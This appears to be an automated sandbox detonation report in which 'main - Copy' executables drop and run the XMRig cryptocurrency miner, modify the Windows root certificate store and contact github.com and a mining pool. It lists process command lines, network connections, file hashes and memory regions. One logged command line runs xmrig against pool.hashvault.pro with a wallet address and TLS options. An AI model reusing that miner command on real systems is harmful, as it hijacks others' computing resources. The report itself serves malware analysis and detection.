| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 444 wrote to memory of 1948 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 444 wrote to memory of 1948 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1948-16-0x000002D5FDA90000-0x000002D5FDAB0000-memory.dmp
memory/1948-17-0x000002D5FDAD0000-0x000002D5FDAF0000-memory.dmp
memory/1948-18-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-21-0x000002D5FDAF0000-0x000002D5FDB10000-memory.dmp
memory/1948-20-0x000002D5FDB10000-0x000002D5FDB30000-memory.dmp
memory/1948-19-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-22-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-23-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-25-0x000002D5FDAF0000-0x000002D5FDB10000-memory.dmp
memory/1948-24-0x000002D5FDB10000-0x000002D5FDB30000-memory.dmp
memory/1948-26-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-27-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-28-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-29-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-30-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-31-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-32-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-33-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-34-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-35-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-36-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-37-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-38-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-39-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-40-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-41-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-42-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-43-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-44-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-45-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-46-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-47-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-48-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-49-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-50-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-51-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-52-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-53-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-54-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-55-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-56-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-57-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-58-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-59-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-60-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-61-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-62-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-63-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-64-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-65-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-66-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-67-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-68-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-69-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-70-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-71-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-72-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-73-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-74-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-75-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-76-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-77-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-78-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-79-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-80-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-81-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-82-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-83-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
memory/1948-84-0x00007FF60B870000-0x00007FF60C373000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3220 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3220 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2968-16-0x000001B427B10000-0x000001B427B30000-memory.dmp
memory/2968-17-0x000001B427B60000-0x000001B427B80000-memory.dmp
memory/2968-18-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-19-0x000001B427B80000-0x000001B427BA0000-memory.dmp
memory/2968-20-0x000001B427BA0000-0x000001B427BC0000-memory.dmp
memory/2968-21-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-22-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-25-0x000001B427BA0000-0x000001B427BC0000-memory.dmp
memory/2968-24-0x000001B427B80000-0x000001B427BA0000-memory.dmp
memory/2968-23-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-26-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-27-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-28-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-29-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-30-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-31-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-32-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-33-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-34-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-35-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-36-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-37-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-38-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-39-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-40-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-41-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-42-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-43-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-44-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-45-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-46-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-47-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-48-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-49-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-50-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
